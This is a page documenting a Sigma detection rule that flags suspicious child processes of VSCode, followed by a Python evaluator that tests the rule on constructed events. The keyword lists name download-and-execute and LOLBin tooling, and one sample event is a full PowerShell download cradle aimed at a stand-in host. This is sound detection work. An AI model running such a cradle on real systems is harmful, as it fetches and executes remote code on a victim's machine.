LoFP / In development environments where VSCode is used heavily, false positives may occur when developers use tasks to compile or execute different types of code. Remove or add processes accordingly.

Techniques

Sample rules

Potentially Suspicious Child Process Of VsCode

Description

Detects uncommon or suspicious child processes spawned by a VSCode "code.exe" process. This could indicate an attempt at persistence via VSCode tasks or terminal profiles.

Detection logic

selection_parent:
  ParentImage|endswith: '\code.exe'
selection_children_cli:
  # Both fields must match: a shell child whose command line carries a download/execute or LOLBin keyword
  Image|endswith:
  - '\powershell.exe'
  - '\pwsh.exe'
  - '\cmd.exe'
  CommandLine|contains:
  - 'Invoke-Expression'   # the cmdlet is Invoke-Expression; 'contains' on 'Invoke-Expressions' would never match it
  - 'IEX'
  - 'Invoke-Command'
  - 'ICM'
  - 'DownloadString'
  - 'rundll32'
  - 'regsvr32'
  - 'wscript'
  - 'cscript'
selection_children_images:
  Image|endswith:
  - '\calc.exe'
  - '\regsvr32.exe'
  - '\rundll32.exe'
  - '\cscript.exe'
  - '\wscript.exe'
selection_children_paths:
  Image|contains:
  - ':\Users\Public\'
  - ':\Windows\Temp\'
  - ':\Temp\'
condition: selection_parent and 1 of selection_children_*
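To see how the rule above behaves on real-looking process-creation events, and how the false-positive note at the top of the page translates into a tuning step, here is an added example (it is not part of the page or of the Sigma project's own code). It hard-codes the rule's three `selection_children_*` groups plus the parent check, applies Sigma's default case-insensitive `contains`/`endswith` matching, and runs over events constructed for this example: a plain `npm run build` task, a task that calls `cscript.exe` for a signing script, a `dotnet build` of a project folder named `BasicMath`, a PowerShell download cradle, a binary launched from `C:\Users\Public\`, and the same cradle spawned by Explorer rather than VSCode. The `KNOWN_DEV_TASKS` allow-list is an assumption standing in for whatever an environment decides to exclude.

```python
"""Hand-written evaluator for the 'Potentially Suspicious Child Process Of VsCode'
logic, run over constructed Windows process-creation events (example code, not
the rule's reference implementation)."""

from __future__ import annotations

# Selections transcribed from the rule. Sigma string modifiers compare
# case-insensitively, so every pattern is lower-case and values are lowered.
PARENT_ENDSWITH = ("\\code.exe",)
CLI_IMAGES = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe")
CLI_KEYWORDS = ("invoke-expression", "iex", "invoke-command", "icm",
                "downloadstring", "rundll32", "regsvr32", "wscript", "cscript")
SUSPICIOUS_IMAGES = ("\\calc.exe", "\\regsvr32.exe", "\\rundll32.exe",
                     "\\cscript.exe", "\\wscript.exe")
SUSPICIOUS_PATHS = (":\\users\\public\\", ":\\windows\\temp\\", ":\\temp\\")

# Tuning hook for the false-positive note: command-line fragments of developer
# tasks that are expected to spawn otherwise-suspicious children here (assumed).
KNOWN_DEV_TASKS = ("cscript.exe //nologo tools\\sign.vbs",)

VSCODE = "C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
CMD = "C:\\Windows\\System32\\cmd.exe"
PWSH = "C:\\Program Files\\PowerShell\\7\\pwsh.exe"
CRADLE = PWSH + " -NoProfile -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""

# Constructed sample events (Sysmon/4688-style field names used by the rule).
SAMPLE_EVENTS = {
    "build_task":    {"ParentImage": VSCODE, "Image": CMD, "CommandLine": CMD + " /d /c npm run build"},
    "vbs_tool":      {"ParentImage": VSCODE, "Image": CMD, "CommandLine": CMD + " /d /c cscript.exe //nologo tools\\sign.vbs"},
    "icm_substring": {"ParentImage": VSCODE, "Image": CMD, "CommandLine": CMD + " /d /c dotnet build src\\BasicMath"},
    "downloader":    {"ParentImage": VSCODE, "Image": PWSH, "CommandLine": CRADLE},
    "public_drop":   {"ParentImage": VSCODE, "Image": "C:\\Users\\Public\\update.exe", "CommandLine": "C:\\Users\\Public\\update.exe"},
    "not_vscode":    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PWSH, "CommandLine": CRADLE},
}


def _ends_with_any(value: str, suffixes) -> bool:
    v = value.lower()
    return any(v.endswith(s) for s in suffixes)


def _contains_any(value: str, needles) -> bool:
    v = value.lower()
    return any(n in v for n in needles)


def matched_selections(event: dict) -> list[str]:
    """Return the selection_children_* groups that fire for one event.

    An empty list means no match. The condition is
    'selection_parent and 1 of selection_children_*': the parent check gates
    everything, and any single child group is enough to alert."""
    if not _ends_with_any(event.get("ParentImage", ""), PARENT_ENDSWITH):
        return []
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    hits = []
    # selection_children_cli ANDs its two fields: shell image AND keyword.
    if _ends_with_any(image, CLI_IMAGES) and _contains_any(cmdline, CLI_KEYWORDS):
        hits.append("selection_children_cli")
    if _ends_with_any(image, SUSPICIOUS_IMAGES):
        hits.append("selection_children_images")
    if _contains_any(image, SUSPICIOUS_PATHS):
        hits.append("selection_children_paths")
    return hits


def tuned_matches(event: dict, known_tasks=KNOWN_DEV_TASKS) -> list[str]:
    """Apply the rule, then drop hits whose command line is a known dev task."""
    hits = matched_selections(event)
    if hits and _contains_any(event.get("CommandLine", ""), known_tasks):
        return []
    return hits


def triage(events: dict) -> dict:
    """Map each event name to (raw hits, hits after tuning)."""
    return {name: (matched_selections(ev), tuned_matches(ev)) for name, ev in events.items()}


if __name__ == "__main__":
    for name, (raw, tuned) in triage(SAMPLE_EVENTS).items():
        print(f"{name:14s} raw={raw} tuned={tuned}")
```

Two things the run makes visible. First, `ICM` and `IEX` are matched as bare substrings, so a build of a folder called `BasicMath` fires `selection_children_cli` just as the download cradle does; that is where much of the developer-task noise described in the false-positive note comes from, and it is why tuning is done by excluding specific known command lines rather than by loosening the keyword list. Second, the `Code.exe` binary is capitalised on disk, so a case-sensitive backend would silently miss the parent check; the case-insensitive comparison here is what Sigma specifies by default.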